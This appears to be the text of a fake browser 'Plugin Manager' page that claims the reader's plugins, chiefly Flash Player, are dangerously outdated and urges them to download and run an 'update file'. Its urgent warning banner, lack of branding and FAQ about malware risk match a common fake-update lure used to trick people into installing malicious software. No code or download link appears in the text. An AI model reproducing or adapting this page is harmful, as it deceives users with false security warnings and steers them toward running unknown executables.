Plugin Manager

#### WARNING: Your browser plugins are severely out of date. Update your browser plugins to continue browsing securely.

# Update Your Plugins

#### Keeping your plugins up to date helps your browser run safely and smoothly.

# Plugin Status

### Plugin | ### Status | ### Action
--- | --- | ---
Flash Player Flash Player is a lightweight browser plug-in and rich Internet application runtime that delivers consistent and engaging user experiences, stunning audio/video playback, and exciting gameplay | Outdated | ####

- #### Step 1: Click 'Update Now' to download the update file.

- #### Step 2: Run the update file to update your plugins.

# Frequently Asked Questions

### What is a plugin?

- #### Plugins power videos, animation and games.

- #### Plugins don't always update automatically.

- #### They're built outside of your browser by companies like Adobe Systems and Apple.

### How does Plugin Manager help me?

#### Your browser's plugin manager automatically updates most of your plugins for you. However, some plugins occassionally require manual updating.

### Why should I update my plugins?

- #### Old plugins increase your risk for attack by malware, viruses, and other security threats.

- #### Updated plugins have improvements that make the web better and safer for you.

- #### Old plugins can interrupt browsing and waste your time.